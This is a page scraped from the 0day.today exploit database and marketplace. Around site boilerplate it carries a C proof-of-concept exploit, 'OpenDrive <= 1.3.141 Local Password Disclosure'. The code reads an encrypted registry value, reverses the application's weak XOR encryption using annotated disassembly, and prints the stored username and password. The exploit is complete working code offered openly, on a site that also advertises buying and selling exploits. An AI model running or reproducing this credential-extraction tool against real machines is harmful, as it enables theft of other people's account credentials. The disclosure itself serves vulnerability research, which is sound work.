0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

OpenDrive <= 1.3.141 Local Password Disclosure

Author

Glafkos Charalambous

Risk

[

Security Risk Unsored

]

0day-ID

Category

Date add

Platform

/*
 
Title: OpenDrive <= 1.3.141 Local Password Disclosure
Author(s): Glafkos Charalambous, George Nicolaou
Contact: glafkos[at]astalavista[dot]com, ishtus[at]astalavista[dot]com
Version: 1.3.141
Vendor: http://www.opendrive.com
Description: Authentication credentials used by the OpenDrive application are
prone to local disclosure attacks due to a weak cryptographic algorithm implementation
 
Encrypted Values:
[HKEY_CURRENT_USER\CLSID\{6E830710-B00F-4bec-9BD7-F95C1F837D02}]
"Data1"=hex:6b,c3,24,c3,69,c3,6f,c3,00,00,04,c3,52,c3,01,c3,53,c3,00,c3,56,c3,0b,c3,54,c3,00,00
 
Decrypted Values:
Username: 0x41
Password: d3c0d3m3
 
*/
 
#include <stdio.h>
#include <wchar.h>
#include <windows.h>
 
int ReadRegistryKey( LPBYTE lpBuffer, LPDWORD lpBufferSize, HKEY hKey,
                    LPCTSTR lpszSubKey, LPCTSTR lpszValueName )
{
    HKEY hKeyLocal;
    int nType;
    if( RegOpenKeyEx(hKey, lpszSubKey, 0, KEY_READ, &hKeyLocal )
        == ERROR_SUCCESS ) {
        if( RegQueryValueEx( hKeyLocal, lpszValueName, 0, (LPDWORD)&nType,
            lpBuffer, lpBufferSize ) == ERROR_SUCCESS ) {
            return nType;
        }
        return -1;
    }
    return -1;
}
 
int GetRegistryValueSize( HKEY hKey, LPCTSTR lpszSubKey, LPCTSTR lpszValueName )
{
    HKEY hKeyLocal;
    unsigned long nSize;
    if( RegOpenKeyEx(hKey, lpszSubKey, 0, KEY_READ, &hKeyLocal ) == ERROR_SUCCESS ) {
        if( RegQueryValueEx( hKeyLocal, lpszValueName, 0, NULL, NULL, (LPDWORD)&nSize ) == ERROR_SUCCESS) {
            return (int)nSize;
        }
        return -1;
    }
    return -1;
}
 
void DecryptOpenDrive( unsigned short *ciphertxt, int len )
{
    short username[100] = {0};
    short password[100] = {0};
     
    int count = 0; // ECX
    int wchr = 0; // ESI
    int pos = 0; // EAX
    int round = 0; // EDX
    unsigned short tmp;
    short *output;
    output = (short *)&username;
    do {
        //00401626  |>  83F9 02       /CMP ECX,2
        //00401629  |.  7D 38         |JGE SHORT OpenDriv.00401663
        //0040162B  |.  0FB73453      |MOVZX ESI,WORD PTR DS:[EBX+EDX*2]
        //0040162F  |.  66:85F6       |TEST SI,SI
        //00401632  |.  75 0F         |JNZ SHORT OpenDriv.00401643
        if ( ( wchr = ciphertxt[round] ) ) {
            //00401643  |>  8D9A 5BC3FFFF |LEA EBX,DWORD PTR DS:[EDX-3CA5] // 0, 1
            tmp = round - 0x3CA5;
            //00401649  |.  33DE          |XOR EBX,ESI // ESI = ciph[0], ciph[1]
            tmp = tmp ^ (unsigned int)wchr;
            //0040164B  |.  8B748C 20     |MOV ESI,DWORD PTR SS:[ESP+ECX*4+20]
            //0040164F  |.  66:891C46     |MOV WORD PTR DS:[ESI+EAX*2],BX // out[0] = BX
            *output++ = tmp;
            //00401653  |.  40            |INC EAX // 0 -> 1
        }
        else {
            count++;
            if(count >= 2) break;
            //00401634  |.  8B748C 20     |MOV ESI,DWORD PTR SS:[ESP+ECX*4+20]
            //00401638  |.  33DB          |XOR EBX,EBX
            //0040163A  |.  66:891C46     |MOV WORD PTR DS:[ESI+EAX*2],BX
            *output = 0;
            output = (short *)&password;
            //0040163E  |.  41            |INC ECX
            //0040163F  |.  33C0          |XOR EAX,EAX
        }
        round++;
    }
    while(1);
    wprintf(L"Username: %ls\nPassword: %ls\n",username, password);
}
 
int main() {
    int nRegistryKeySize;
    LPBYTE buffer;
    if ( (nRegistryKeySize = GetRegistryValueSize( HKEY_CURRENT_USER, TEXT("CLSID\\{6E830710-B00F-4bec-9BD7-F95C1F837D02}"), TEXT("Data1") ) ) != -1 ) {
        buffer = (LPBYTE)calloc( nRegistryKeySize, sizeof(char) );
        if( ReadRegistryKey(buffer, (LPDWORD)&nRegistryKeySize, HKEY_CURRENT_USER, TEXT("CLSID\\{6E830710-B00F-4bec-9BD7-F95C1F837D02}"), TEXT("Data1") ) != -1 ) {
            DecryptOpenDrive( (unsigned short *)buffer, nRegistryKeySize );
        }
        else {
        wprintf(L"Error reading registry key\n");
        }
    }
}



#  0day.today [2024-12-28]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

OpenDrive <= 1.3.141 Local Password Disclosure

Report Error

Report Error